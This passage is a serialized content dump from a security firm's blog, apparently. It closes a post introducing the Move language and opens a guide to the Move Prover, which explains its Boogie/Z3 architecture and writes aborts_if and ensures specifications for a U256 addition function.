aborts_if",{"type":24,"tag":301,"props":15866,"children":15867},{"style":348},[15868],{"type":30,"value":3613},{"type":24,"tag":301,"props":15870,"children":15871},{"style":359},[15872],{"type":30,"value":492},{"type":24,"tag":301,"props":15874,"children":15875},{"class":303,"line":3782},[15876,15880,15884,15888,15892,15896,15900,15904,15908,15912],{"type":24,"tag":301,"props":15877,"children":15878},{"style":369},[15879],{"type":30,"value":15002},{"type":24,"tag":301,"props":15881,"children":15882},{"style":314},[15883],{"type":30,"value":15372},{"type":24,"tag":301,"props":15885,"children":15886},{"style":359},[15887],{"type":30,"value":362},{"type":24,"tag":301,"props":15889,"children":15890},{"style":369},[15891],{"type":30,"value":5599},{"type":24,"tag":301,"props":15893,"children":15894},{"style":359},[15895],{"type":30,"value":911},{"type":24,"tag":301,"props":15897,"children":15898},{"style":385},[15899],{"type":30,"value":607},{"type":24,"tag":301,"props":15901,"children":15902},{"style":314},[15903],{"type":30,"value":15372},{"type":24,"tag":301,"props":15905,"children":15906},{"style":359},[15907],{"type":30,"value":362},{"type":24,"tag":301,"props":15909,"children":15910},{"style":369},[15911],{"type":30,"value":15181},{"type":24,"tag":301,"props":15913,"children":15914},{"style":359},[15915],{"type":30,"value":589},{"type":24,"tag":301,"props":15917,"children":15918},{"class":303,"line":3791},[15919,15923,15927,15931,15935,15939,15943,15947,15951,15955,15959,15963,15968,15972,15976,15980,15984,15988,15992,15996,16000,16004,16008,16012,16016],{"type":24,"tag":301,"props":15920,"children":15921},{"style":369},[15922],{"type":30,"value":15002},{"type":24,"tag":301,"props":15924,"children":15925},{"style":369},[15926],{"type":30,"value":15432},{"type":24,"tag":301,"props":15928,"children":15929},{"style":369},[15930],{"type":30,"value":15437},{"type":24,"tag":301,"props":15932,"children":15933},{"style":348},[15934],{"type":30,"value":9878},{"type":24,"tag":301,"props":15936,"children":15937},{"style":466},[15938],{"type":30,"value":685},{"type":24,"tag":301,"props":15940,"children":15941},{"style":385},[15942],{"type":30,"value":9887},{"type":24,"tag":301,"props":15944,"children":15945},{"style":314},[15946],{"type":30,"value":6156},{"type":24,"tag":301,"props":15948,"children":15949},{"style":359},[15950],{"type":30,"value":362},{"type":24,"tag":301,"props":15952,"children":15953},{"style":369},[15954],{"type":30,"value":15181},{"type":24,"tag":301,"props":15956,"children":15957},{"style":359},[15958],{"type":30,"value":9961},{"type":24,"tag":301,"props":15960,"children":15961},{"style":385},[15962],{"type":30,"value":1679},{"type":24,"tag":301,"props":15964,"children":15965},{"style":369},[15966],{"type":30,"value":15967}," result",{"type":24,"tag":301,"props":15969,"children":15970},{"style":359},[15971],{"type":30,"value":541},{"type":24,"tag":301,"props":15973,"children":15974},{"style":369},[15975],{"type":30,"value":15470},{"type":24,"tag":301,"props":15977,"children":15978},{"style":359},[15979],{"type":30,"value":1046},{"type":24,"tag":301,"props":15981,"children":15982},{"style":385},[15983],{"type":30,"value":607},{"type":24,"tag":301,"props":15985,"children":15986},{"style":369},[15987],{"type":30,"value":15483},{"type":24,"tag":301,"props":15989,"children":15990},{"style":359},[15991],{"type":30,"value":541},{"type":24,"tag":301,"props":15993,"children":15994},{"style":369},[15995],{"type":30,"value":15470},{"type":24,"tag":301,"props":15997,"children":15998},{"style":359},[15999],{"type":30,"value":1046},{"type":24,"tag":301,"props":16001,"children":16002},{"style":385},[16003],{"type":30,"value":772},{"type":24,"tag":301,"props":16005,"children":16006},{"style":314},[16007],{"type":30,"value":15372},{"type":24,"tag":301,"props":16009,"children":16010},{"style":359},[16011],{"type":30,"value":362},{"type":24,"tag":301,"props":16013,"children":16014},{"style":369},[16015],{"type":30,"value":15181},{"type":24,"tag":301,"props":16017,"children":16018},{"style":359},[16019],{"type":30,"value":589},{"type":24,"tag":301,"props":16021,"children":16022},{"class":303,"line":3819},[16023],{"type":24,"tag":301,"props":16024,"children":16025},{"style":359},[16026],{"type":30,"value":6918},{"type":24,"tag":43,"props":16028,"children":16029},{"id":12133},[16030],{"type":30,"value":12136},{"type":24,"tag":32,"props":16032,"children":16033},{},[16034],{"type":30,"value":16035},"In this post, we explored implications of Move's type system and formal verification, two powerful features of the Move language that enable safer programming languages.",{"type":24,"tag":32,"props":16037,"children":16038},{},[16039],{"type":30,"value":16040},"While Move as a language is still a language in active development, it shows some exciting features that seem allows developers to create structurally safer programs.",{"type":24,"tag":32,"props":16042,"children":16043},{},[16044,16046,16053],{"type":30,"value":16045},"We're passionate about pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":24,"tag":188,"props":16047,"children":16050},{"href":16048,"rel":16049},"https://twitter.com/notdeghost/",[192],[16051],{"type":30,"value":16052},"@notdeghost",{"type":30,"value":206},{"type":24,"tag":9672,"props":16055,"children":16056},{},[16057],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":16059},[16060,16061,16062],{"id":12579,"depth":320,"text":12582},{"id":14612,"depth":320,"text":14615},{"id":12133,"depth":320,"text":12136},"content:blog:2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction",{"_path":16067,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":16068,"description":16069,"author":12540,"image":16070,"date":16073,"isFeatured":16,"tags":16074,"onBlogPage":16,"body":16077,"_type":9700,"_id":20407,"_source":9702,"_file":20408,"_stem":20409,"_extension":9705},"/blog/2022-09-16-move-prover","The Move Prover: A Guide","A practical guide to the Move Prover - tutorial, case study, and specifications.",{"src":16071,"height":16072,"width":12544},"/posts/move-prover/move-prover-title.jpg",1019,"2022-09-16",[16075,16076],"move","tutorial",{"type":21,"children":16078,"toc":20393},[16079,16098,16110,16116,16121,16126,16131,16140,16145,16159,16164,16170,16175,16189,16194,16330,16343,16348,16369,16402,16413,16418,16423,16433,16446,16788,16802,16820,16865,16878,16897,17069,17074,17079,17104,17109,17707,17719,17731,17736,17750,17755,17768,17807,17812,17844,17849,17854,17867,18252,18279,18486,18491,18503,18737,18742,18750,18769,19115,19120,19276,19281,19288,19302,19308,19313,19318,19324,19337,19569,19575,19580,19600,19869,19874,19880,19892,19897,19911,19917,19952,20052,20073,20079,20084,20089,20341,20346,20364,20368,20373,20378,20389],{"type":24,"tag":32,"props":16080,"children":16081},{},[16082,16084,16089,16091,16096],{"type":30,"value":16083},"Formal verification -- a powerful tool for ",{"type":24,"tag":5422,"props":16085,"children":16086},{},[16087],{"type":30,"value":16088},"proving",{"type":30,"value":16090}," the correctness of your programs. How does it ",{"type":24,"tag":5422,"props":16092,"children":16093},{},[16094],{"type":30,"value":16095},"actually",{"type":30,"value":16097}," work? This blog post will provide practical tips to help you use the Move Prover to its fullest potential, as well as explore a real-world example of how we used formal verification to secure a smart contract.",{"type":24,"tag":32,"props":16099,"children":16100},{},[16101,16103,16108],{"type":30,"value":16102},"At a high level, formal verification allows you to provide a specification for the program. This specification is then checked against symbolic inputs, allowing you to prove that your code follows the specification for ",{"type":24,"tag":5422,"props":16104,"children":16105},{},[16106],{"type":30,"value":16107},"all",{"type":30,"value":16109}," possible inputs.",{"type":24,"tag":43,"props":16111,"children":16113},{"id":16112},"move-prover",[16114],{"type":30,"value":16115},"Move Prover",{"type":24,"tag":32,"props":16117,"children":16118},{},[16119],{"type":30,"value":16120},"The Move Prover is an automated tool that allows developers to formally verify smart contracts written in the Move programming language.",{"type":24,"tag":32,"props":16122,"children":16123},{},[16124],{"type":30,"value":16125},"Move was primarily designed to facilitate automatic verification. Interestingly, the Move Prove operates on the Move bytecode itself, avoiding potential compiler bugs from interfering with prover correctness.",{"type":24,"tag":32,"props":16127,"children":16128},{},[16129],{"type":30,"value":16130},"The architecture of the tool consists of multiple components as illustrated below.",{"type":24,"tag":32,"props":16132,"children":16133},{},[16134],{"type":24,"tag":177,"props":16135,"children":16139},{"alt":16136,"src":16137,"title":16138},"Move Prover arch","https://i.imgur.com/ti4vkTu.png","Move Prover Architecture",[],{"type":24,"tag":32,"props":16141,"children":16142},{},[16143],{"type":30,"value":16144},"First, the Move prover receives a Move source file (an input) that contains specifications of the intended behavior of the program. Those specifications are then extracted from the annotated source by the Move Parser. Consequently, the tool compiles the source code into Move bytecode which is verified and converted into a prover object model plus the specification system \"blueprint\".",{"type":24,"tag":32,"props":16146,"children":16147},{},[16148,16150,16157],{"type":30,"value":16149},"The model is translated into an intermediate language, called ",{"type":24,"tag":188,"props":16151,"children":16154},{"href":16152,"rel":16153},"https://www.microsoft.com/en-us/research/project/boogie-an-intermediate-verification-language/",[192],[16155],{"type":30,"value":16156},"Boogie",{"type":30,"value":16158},". This Boogie code is then passed to the Boogie verification system which generates the input for the solver using a \"verification condition generation\". The verification condition (VC) is passed to an automated theorem prover (Z3).",{"type":24,"tag":32,"props":16160,"children":16161},{},[16162],{"type":30,"value":16163},"Once the VC is passed to the Z3, the prover checks if the SMT formula is unsatisfiable. If so, it means that the specifications hold. Otherwise, a model that satisfies the conditions is generated and converted back into Boogie format in order to issue a diagnosis report. The diagnosis report is then reverted to a source-level error which parallels a standard compiler error.",{"type":24,"tag":43,"props":16165,"children":16167},{"id":16166},"move-specification-language",[16168],{"type":30,"value":16169},"Move Specification Language",{"type":24,"tag":32,"props":16171,"children":16172},{},[16173],{"type":30,"value":16174},"Move MSL is a subset of the Move Language, which introduces support to statically describe the behavior about the correctness of a program with no implications on production.",{"type":24,"tag":32,"props":16176,"children":16177},{},[16178,16180,16187],{"type":30,"value":16179},"To better understand how to use the MSL, we will use ",{"type":24,"tag":188,"props":16181,"children":16184},{"href":16182,"rel":16183},"https://github.com/pontem-network/u256",[192],[16185],{"type":30,"value":16186},"Pontem's U256 library",{"type":30,"value":16188},", an open source Move library which implements support for U256 numbers, as a case study.",{"type":24,"tag":32,"props":16190,"children":16191},{},[16192],{"type":30,"value":16193},"The U256 number is implemented as a struct which contains 4 u64 numbers.",{"type":24,"tag":291,"props":16195,"children":16197},{"code":16196,"language":9817,"meta":7,"className":9818,"style":7},"struct U256 has copy, drop, store {\n v0: u64,\n v1: u64,\n v2: u64,\n v3: u64,\n}\n",[16198],{"type":24,"tag":145,"props":16199,"children":16200},{"__ignoreMap":7},[16201,16243,16263,16283,16303,16323],{"type":24,"tag":301,"props":16202,"children":16203},{"class":303,"line":304},[16204,16208,16212,16217,16222,16226,16231,16235,16239],{"type":24,"tag":301,"props":16205,"children":16206},{"style":348},[16207],{"type":30,"value":3010},{"type":24,"tag":301,"props":16209,"children":16210},{"style":10246},[16211],{"type":30,"value":11553},{"type":24,"tag":301,"props":16213,"children":16214},{"style":369},[16215],{"type":30,"value":16216}," has",{"type":24,"tag":301,"props":16218,"children":16219},{"style":369},[16220],{"type":30,"value":16221}," copy",{"type":24,"tag":301,"props":16223,"children":16224},{"style":359},[16225],{"type":30,"value":377},{"type":24,"tag":301,"props":16227,"children":16228},{"style":369},[16229],{"type":30,"value":16230},"drop",{"type":24,"tag":301,"props":16232,"children":16233},{"style":359},[16234],{"type":30,"value":377},{"type":24,"tag":301,"props":16236,"children":16237},{"style":369},[16238],{"type":30,"value":12760},{"type":24,"tag":301,"props":16240,"children":16241},{"style":359},[16242],{"type":30,"value":3035},{"type":24,"tag":301,"props":16244,"children":16245},{"class":303,"line":320},[16246,16251,16255,16259],{"type":24,"tag":301,"props":16247,"children":16248},{"style":369},[16249],{"type":30,"value":16250}," v0",{"type":24,"tag":301,"props":16252,"children":16253},{"style":385},[16254],{"type":30,"value":1679},{"type":24,"tag":301,"props":16256,"children":16257},{"style":10246},[16258],{"type":30,"value":12680},{"type":24,"tag":301,"props":16260,"children":16261},{"style":359},[16262],{"type":30,"value":1729},{"type":24,"tag":301,"props":16264,"children":16265},{"class":303,"line":335},[16266,16271,16275,16279],{"type":24,"tag":301,"props":16267,"children":16268},{"style":369},[16269],{"type":30,"value":16270}," v1",{"type":24,"tag":301,"props":16272,"children":16273},{"style":385},[16274],{"type":30,"value":1679},{"type":24,"tag":301,"props":16276,"children":16277},{"style":10246},[16278],{"type":30,"value":12680},{"type":24,"tag":301,"props":16280,"children":16281},{"style":359},[16282],{"type":30,"value":1729},{"type":24,"tag":301,"props":16284,"children":16285},{"class":303,"line":344},[16286,16291,16295,16299],{"type":24,"tag":301,"props":16287,"children":16288},{"style":369},[16289],{"type":30,"value":16290}," v2",{"type":24,"tag":301,"props":16292,"children":16293},{"style":385},[16294],{"type":30,"value":1679},{"type":24,"tag":301,"props":16296,"children":16297},{"style":10246},[16298],{"type":30,"value":12680},{"type":24,"tag":301,"props":16300,"children":16301},{"style":359},[16302],{"type":30,"value":1729},{"type":24,"tag":301,"props":16304,"children":16305},{"class":303,"line":401},[16306,16311,16315,16319],{"type":24,"tag":301,"props":16307,"children":16308},{"style":369},[16309],{"type":30,"value":16310}," v3",{"type":24,"tag":301,"props":16312,"children":16313},{"style":385},[16314],{"type":30,"value":1679},{"type":24,"tag":301,"props":16316,"children":16317},{"style":10246},[16318],{"type":30,"value":12680},{"type":24,"tag":301,"props":16320,"children":16321},{"style":359},[16322],{"type":30,"value":1729},{"type":24,"tag":301,"props":16324,"children":16325},{"class":303,"line":415},[16326],{"type":24,"tag":301,"props":16327,"children":16328},{"style":359},[16329],{"type":30,"value":698},{"type":24,"tag":32,"props":16331,"children":16332},{},[16333,16335,16341],{"type":30,"value":16334},"Now, let's consider the ",{"type":24,"tag":145,"props":16336,"children":16338},{"className":16337},[],[16339],{"type":30,"value":16340},"add(a: U256, b: U256): U256",{"type":30,"value":16342}," function. In order to verify the correctness of such a function, it might be useful to verify some of the group axioms, for example: commutativity and associativity.",{"type":24,"tag":32,"props":16344,"children":16345},{},[16346],{"type":30,"value":16347},"Specifications are declared in a specification block, which can be found in Move functions, as module member, or in a different file as a separate specification module.",{"type":24,"tag":32,"props":16349,"children":16350},{},[16351,16353,16359,16361,16368],{"type":30,"value":16352},"For example, if your file is ",{"type":24,"tag":145,"props":16354,"children":16356},{"className":16355},[],[16357],{"type":30,"value":16358},"sources/u256.move",{"type":30,"value":16360},", you can put specifications in ",{"type":24,"tag":188,"props":16362,"children":16365},{"href":16363,"rel":16364},"https://github.com/pontem-network/u256/blob/main/sources/u256.spec.move",[192],[16366],{"type":30,"value":16367},"sources/u256.spec.move",{"type":30,"value":206},{"type":24,"tag":291,"props":16370,"children":16372},{"code":16371,"language":9817,"meta":7,"className":9818,"style":7},"spec add { ... }\n",[16373],{"type":24,"tag":145,"props":16374,"children":16375},{"__ignoreMap":7},[16376],{"type":24,"tag":301,"props":16377,"children":16378},{"class":303,"line":304},[16379,16383,16388,16393,16397],{"type":24,"tag":301,"props":16380,"children":16381},{"style":369},[16382],{"type":30,"value":15090},{"type":24,"tag":301,"props":16384,"children":16385},{"style":369},[16386],{"type":30,"value":16387}," add",{"type":24,"tag":301,"props":16389,"children":16390},{"style":359},[16391],{"type":30,"value":16392}," { ",{"type":24,"tag":301,"props":16394,"children":16395},{"style":385},[16396],{"type":30,"value":4054},{"type":24,"tag":301,"props":16398,"children":16399},{"style":359},[16400],{"type":30,"value":16401}," }\n",{"type":24,"tag":32,"props":16403,"children":16404},{},[16405,16407,16412],{"type":30,"value":16406},"The specifications placed inside the specification blocks are considered ",{"type":24,"tag":5422,"props":16408,"children":16409},{},[16410],{"type":30,"value":16411},"Expressions",{"type":30,"value":206},{"type":24,"tag":80,"props":16414,"children":16416},{"id":16415},"expressions",[16417],{"type":30,"value":16411},{"type":24,"tag":32,"props":16419,"children":16420},{},[16421],{"type":30,"value":16422},"Let's go over some common expressions.",{"type":24,"tag":32,"props":16424,"children":16425},{},[16426,16431],{"type":24,"tag":145,"props":16427,"children":16429},{"className":16428},[],[16430],{"type":30,"value":15139},{"type":30,"value":16432}," defines when the function can abort. This is especially useful in the context of smart contract development, where an abort would cause the entire transaction to rollback.",{"type":24,"tag":32,"props":16434,"children":16435},{},[16436,16438,16444],{"type":30,"value":16437},"For example, the ",{"type":24,"tag":145,"props":16439,"children":16441},{"className":16440},[],[16442],{"type":30,"value":16443},"add",{"type":30,"value":16445}," function aborts if and only if the U256 addition overflows. Let's put these words into an expression:",{"type":24,"tag":291,"props":16447,"children":16449},{"code":16448,"language":9817,"meta":7,"className":9818,"style":7},"const P64: u128 = 0x10000000000000000;\n\nspec fun value_of_U256(a: U256): num {\n a.v0 +\n a.v1 * P64 +\n a.v2 * P64 * P64 +\n a.v3 * P64 * P64 * P64\n}\n\nspec add {\n aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n}\n",[16450],{"type":24,"tag":145,"props":16451,"children":16452},{"__ignoreMap":7},[16453,16487,16494,16543,16565,16594,16630,16671,16678,16685,16700,16781],{"type":24,"tag":301,"props":16454,"children":16455},{"class":303,"line":304},[16456,16461,16466,16470,16474,16478,16483],{"type":24,"tag":301,"props":16457,"children":16458},{"style":348},[16459],{"type":30,"value":16460},"const",{"type":24,"tag":301,"props":16462,"children":16463},{"style":359},[16464],{"type":30,"value":16465}," P64",{"type":24,"tag":301,"props":16467,"children":16468},{"style":385},[16469],{"type":30,"value":1679},{"type":24,"tag":301,"props":16471,"children":16472},{"style":10246},[16473],{"type":30,"value":15659},{"type":24,"tag":301,"props":16475,"children":16476},{"style":385},[16477],{"type":30,"value":2537},{"type":24,"tag":301,"props":16479,"children":16480},{"style":466},[16481],{"type":30,"value":16482}," 0x10000000000000000",{"type":24,"tag":301,"props":16484,"children":16485},{"style":359},[16486],{"type":30,"value":492},{"type":24,"tag":301,"props":16488,"children":16489},{"class":303,"line":320},[16490],{"type":24,"tag":301,"props":16491,"children":16492},{"emptyLinePlaceholder":16},[16493],{"type":30,"value":341},{"type":24,"tag":301,"props":16495,"children":16496},{"class":303,"line":335},[16497,16501,16505,16510,16514,16518,16522,16526,16530,16534,16539],{"type":24,"tag":301,"props":16498,"children":16499},{"style":369},[16500],{"type":30,"value":15090},{"type":24,"tag":301,"props":16502,"children":16503},{"style":369},[16504],{"type":30,"value":13026},{"type":24,"tag":301,"props":16506,"children":16507},{"style":314},[16508],{"type":30,"value":16509}," value_of_U256",{"type":24,"tag":301,"props":16511,"children":16512},{"style":359},[16513],{"type":30,"value":362},{"type":24,"tag":301,"props":16515,"children":16516},{"style":369},[16517],{"type":30,"value":188},{"type":24,"tag":301,"props":16519,"children":16520},{"style":385},[16521],{"type":30,"value":1679},{"type":24,"tag":301,"props":16523,"children":16524},{"style":10246},[16525],{"type":30,"value":11553},{"type":24,"tag":301,"props":16527,"children":16528},{"style":359},[16529],{"type":30,"value":9961},{"type":24,"tag":301,"props":16531,"children":16532},{"style":385},[16533],{"type":30,"value":1679},{"type":24,"tag":301,"props":16535,"children":16536},{"style":369},[16537],{"type":30,"value":16538}," num",{"type":24,"tag":301,"props":16540,"children":16541},{"style":359},[16542],{"type":30,"value":3035},{"type":24,"tag":301,"props":16544,"children":16545},{"class":303,"line":344},[16546,16551,16555,16560],{"type":24,"tag":301,"props":16547,"children":16548},{"style":369},[16549],{"type":30,"value":16550}," a",{"type":24,"tag":301,"props":16552,"children":16553},{"style":385},[16554],{"type":30,"value":206},{"type":24,"tag":301,"props":16556,"children":16557},{"style":359},[16558],{"type":30,"value":16559},"v0 ",{"type":24,"tag":301,"props":16561,"children":16562},{"style":385},[16563],{"type":30,"value":16564},"+\n",{"type":24,"tag":301,"props":16566,"children":16567},{"class":303,"line":401},[16568,16572,16576,16581,16585,16589],{"type":24,"tag":301,"props":16569,"children":16570},{"style":369},[16571],{"type":30,"value":16550},{"type":24,"tag":301,"props":16573,"children":16574},{"style":385},[16575],{"type":30,"value":206},{"type":24,"tag":301,"props":16577,"children":16578},{"style":359},[16579],{"type":30,"value":16580},"v1 ",{"type":24,"tag":301,"props":16582,"children":16583},{"style":385},[16584],{"type":30,"value":772},{"type":24,"tag":301,"props":16586,"children":16587},{"style":10246},[16588],{"type":30,"value":16465},{"type":24,"tag":301,"props":16590,"children":16591},{"style":385},[16592],{"type":30,"value":16593}," +\n",{"type":24,"tag":301,"props":16595,"children":16596},{"class":303,"line":415},[16597,16601,16605,16610,16614,16618,16622,16626],{"type":24,"tag":301,"props":16598,"children":16599},{"style":369},[16600],{"type":30,"value":16550},{"type":24,"tag":301,"props":16602,"children":16603},{"style":385},[16604],{"type":30,"value":206},{"type":24,"tag":301,"props":16606,"children":16607},{"style":359},[16608],{"type":30,"value":16609},"v2 ",{"type":24,"tag":301,"props":16611,"children":16612},{"style":385},[16613],{"type":30,"value":772},{"type":24,"tag":301,"props":16615,"children":16616},{"style":10246},[16617],{"type":30,"value":16465},{"type":24,"tag":301,"props":16619,"children":16620},{"style":385},[16621],{"type":30,"value":431},{"type":24,"tag":301,"props":16623,"children":16624},{"style":10246},[16625],{"type":30,"value":16465},{"type":24,"tag":301,"props":16627,"children":16628},{"style":385},[16629],{"type":30,"value":16593},{"type":24,"tag":301,"props":16631,"children":16632},{"class":303,"line":439},[16633,16637,16641,16646,16650,16654,16658,16662,16666],{"type":24,"tag":301,"props":16634,"children":16635},{"style":369},[16636],{"type":30,"value":16550},{"type":24,"tag":301,"props":16638,"children":16639},{"style":385},[16640],{"type":30,"value":206},{"type":24,"tag":301,"props":16642,"children":16643},{"style":359},[16644],{"type":30,"value":16645},"v3 ",{"type":24,"tag":301,"props":16647,"children":16648},{"style":385},[16649],{"type":30,"value":772},{"type":24,"tag":301,"props":16651,"children":16652},{"style":10246},[16653],{"type":30,"value":16465},{"type":24,"tag":301,"props":16655,"children":16656},{"style":385},[16657],{"type":30,"value":431},{"type":24,"tag":301,"props":16659,"children":16660},{"style":10246},[16661],{"type":30,"value":16465},{"type":24,"tag":301,"props":16663,"children":16664},{"style":385},[16665],{"type":30,"value":431},{"type":24,"tag":301,"props":16667,"children":16668},{"style":10246},[16669],{"type":30,"value":16670}," P64\n",{"type":24,"tag":301,"props":16672,"children":16673},{"class":303,"line":447},[16674],{"type":24,"tag":301,"props":16675,"children":16676},{"style":359},[16677],{"type":30,"value":698},{"type":24,"tag":301,"props":16679,"children":16680},{"class":303,"line":476},[16681],{"type":24,"tag":301,"props":16682,"children":16683},{"emptyLinePlaceholder":16},[16684],{"type":30,"value":341},{"type":24,"tag":301,"props":16686,"children":16687},{"class":303,"line":495},[16688,16692,16696],{"type":24,"tag":301,"props":16689,"children":16690},{"style":369},[16691],{"type":30,"value":15090},{"type":24,"tag":301,"props":16693,"children":16694},{"style":369},[16695],{"type":30,"value":16387},{"type":24,"tag":301,"props":16697,"children":16698},{"style":359},[16699],{"type":30,"value":3035},{"type":24,"tag":301,"props":16701,"children":16702},{"class":303,"line":504},[16703,16708,16712,16716,16720,16724,16728,16732,16736,16740,16744,16749,16753,16757,16761,16765,16769,16773,16777],{"type":24,"tag":301,"props":16704,"children":16705},{"style":369},[16706],{"type":30,"value":16707}," aborts_if",{"type":24,"tag":301,"props":16709,"children":16710},{"style":314},[16711],{"type":30,"value":16509},{"type":24,"tag":301,"props":16713,"children":16714},{"style":359},[16715],{"type":30,"value":362},{"type":24,"tag":301,"props":16717,"children":16718},{"style":369},[16719],{"type":30,"value":188},{"type":24,"tag":301,"props":16721,"children":16722},{"style":359},[16723],{"type":30,"value":911},{"type":24,"tag":301,"props":16725,"children":16726},{"style":385},[16727],{"type":30,"value":11206},{"type":24,"tag":301,"props":16729,"children":16730},{"style":314},[16731],{"type":30,"value":16509},{"type":24,"tag":301,"props":16733,"children":16734},{"style":359},[16735],{"type":30,"value":362},{"type":24,"tag":301,"props":16737,"children":16738},{"style":369},[16739],{"type":30,"value":5613},{"type":24,"tag":301,"props":16741,"children":16742},{"style":359},[16743],{"type":30,"value":911},{"type":24,"tag":301,"props":16745,"children":16746},{"style":385},[16747],{"type":30,"value":16748},">=",{"type":24,"tag":301,"props":16750,"children":16751},{"style":10246},[16752],{"type":30,"value":16465},{"type":24,"tag":301,"props":16754,"children":16755},{"style":385},[16756],{"type":30,"value":431},{"type":24,"tag":301,"props":16758,"children":16759},{"style":10246},[16760],{"type":30,"value":16465},{"type":24,"tag":301,"props":16762,"children":16763},{"style":385},[16764],{"type":30,"value":431},{"type":24,"tag":301,"props":16766,"children":16767},{"style":10246},[16768],{"type":30,"value":16465},{"type":24,"tag":301,"props":16770,"children":16771},{"style":385},[16772],{"type":30,"value":431},{"type":24,"tag":301,"props":16774,"children":16775},{"style":10246},[16776],{"type":30,"value":16465},{"type":24,"tag":301,"props":16778,"children":16779},{"style":359},[16780],{"type":30,"value":492},{"type":24,"tag":301,"props":16782,"children":16783},{"class":303,"line":512},[16784],{"type":24,"tag":301,"props":16785,"children":16786},{"style":359},[16787],{"type":30,"value":698},{"type":24,"tag":32,"props":16789,"children":16790},{},[16791,16793,16800],{"type":30,"value":16792},"We can observe in the snippet above, that we are allowed to call functions inside the spec block. However, the callee must either be an ",{"type":24,"tag":188,"props":16794,"children":16797},{"href":16795,"rel":16796},"https://github.com/move-language/move/blob/f7d5b1a3f4d622c17f540190fa4fa12323cb0bb8/language/move-prover/doc/user/spec-lang.md#builtin-functions",[192],[16798],{"type":30,"value":16799},"MSL function",{"type":30,"value":16801},", or a pure Move function. A pure Move function can be defined as a function that does not modify the global state or use Move expression features unsupported by MSL.",{"type":24,"tag":32,"props":16803,"children":16804},{},[16805,16807,16812,16813,16818],{"type":30,"value":16806},"A common pattern for ",{"type":24,"tag":145,"props":16808,"children":16810},{"className":16809},[],[16811],{"type":30,"value":15139},{"type":30,"value":5945},{"type":24,"tag":145,"props":16814,"children":16816},{"className":16815},[],[16817],{"type":30,"value":15147},{"type":30,"value":16819},", which lets you prove that a function will never abort.",{"type":24,"tag":291,"props":16821,"children":16823},{"code":16822,"language":9817,"meta":7,"className":9818,"style":7},"spec critical_function {\n aborts_if false;\n}\n",[16824],{"type":24,"tag":145,"props":16825,"children":16826},{"__ignoreMap":7},[16827,16843,16858],{"type":24,"tag":301,"props":16828,"children":16829},{"class":303,"line":304},[16830,16834,16839],{"type":24,"tag":301,"props":16831,"children":16832},{"style":369},[16833],{"type":30,"value":15090},{"type":24,"tag":301,"props":16835,"children":16836},{"style":369},[16837],{"type":30,"value":16838}," critical_function",{"type":24,"tag":301,"props":16840,"children":16841},{"style":359},[16842],{"type":30,"value":3035},{"type":24,"tag":301,"props":16844,"children":16845},{"class":303,"line":320},[16846,16850,16854],{"type":24,"tag":301,"props":16847,"children":16848},{"style":369},[16849],{"type":30,"value":16707},{"type":24,"tag":301,"props":16851,"children":16852},{"style":348},[16853],{"type":30,"value":3613},{"type":24,"tag":301,"props":16855,"children":16856},{"style":359},[16857],{"type":30,"value":492},{"type":24,"tag":301,"props":16859,"children":16860},{"class":303,"line":335},[16861],{"type":24,"tag":301,"props":16862,"children":16863},{"style":359},[16864],{"type":30,"value":698},{"type":24,"tag":32,"props":16866,"children":16867},{},[16868,16870,16876],{"type":30,"value":16869},"Another type of expression that we can use is ",{"type":24,"tag":145,"props":16871,"children":16873},{"className":16872},[],[16874],{"type":30,"value":16875},"ensures",{"type":30,"value":16877},". As the name suggests, it ensures that a certain condition is true at the end of a function's execution.",{"type":24,"tag":32,"props":16879,"children":16880},{},[16881,16883,16888,16890,16895],{"type":30,"value":16882},"In the case of the ",{"type":24,"tag":145,"props":16884,"children":16886},{"className":16885},[],[16887],{"type":30,"value":16443},{"type":30,"value":16889}," function, we want to ensure that the return value is the sum of the 2 parameters. Note that because ",{"type":24,"tag":60,"props":16891,"children":16892},{},[16893],{"type":30,"value":16894},"MSL uses unbounded numbers",{"type":30,"value":16896},", we're able to very cleanly express this property without worrying about overflows.",{"type":24,"tag":291,"props":16898,"children":16900},{"code":16899,"language":9817,"meta":7,"className":9818,"style":7},"spec add {\n aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n}\n",[16901],{"type":24,"tag":145,"props":16902,"children":16903},{"__ignoreMap":7},[16904,16919,16998,17062],{"type":24,"tag":301,"props":16905,"children":16906},{"class":303,"line":304},[16907,16911,16915],{"type":24,"tag":301,"props":16908,"children":16909},{"style":369},[16910],{"type":30,"value":15090},{"type":24,"tag":301,"props":16912,"children":16913},{"style":369},[16914],{"type":30,"value":16387},{"type":24,"tag":301,"props":16916,"children":16917},{"style":359},[16918],{"type":30,"value":3035},{"type":24,"tag":301,"props":16920,"children":16921},{"class":303,"line":320},[16922,16926,16930,16934,16938,16942,16946,16950,16954,16958,16962,16966,16970,16974,16978,16982,16986,16990,16994],{"type":24,"tag":301,"props":16923,"children":16924},{"style":369},[16925],{"type":30,"value":16707},{"type":24,"tag":301,"props":16927,"children":16928},{"style":314},[16929],{"type":30,"value":16509},{"type":24,"tag":301,"props":16931,"children":16932},{"style":359},[16933],{"type":30,"value":362},{"type":24,"tag":301,"props":16935,"children":16936},{"style":369},[16937],{"type":30,"value":188},{"type":24,"tag":301,"props":16939,"children":16940},{"style":359},[16941],{"type":30,"value":911},{"type":24,"tag":301,"props":16943,"children":16944},{"style":385},[16945],{"type":30,"value":11206},{"type":24,"tag":301,"props":16947,"children":16948},{"style":314},[16949],{"type":30,"value":16509},{"type":24,"tag":301,"props":16951,"children":16952},{"style":359},[16953],{"type":30,"value":362},{"type":24,"tag":301,"props":16955,"children":16956},{"style":369},[16957],{"type":30,"value":5613},{"type":24,"tag":301,"props":16959,"children":16960},{"style":359},[16961],{"type":30,"value":911},{"type":24,"tag":301,"props":16963,"children":16964},{"style":385},[16965],{"type":30,"value":16748},{"type":24,"tag":301,"props":16967,"children":16968},{"style":10246},[16969],{"type":30,"value":16465},{"type":24,"tag":301,"props":16971,"children":16972},{"style":385},[16973],{"type":30,"value":431},{"type":24,"tag":301,"props":16975,"children":16976},{"style":10246},[16977],{"type":30,"value":16465},{"type":24,"tag":301,"props":16979,"children":16980},{"style":385},[16981],{"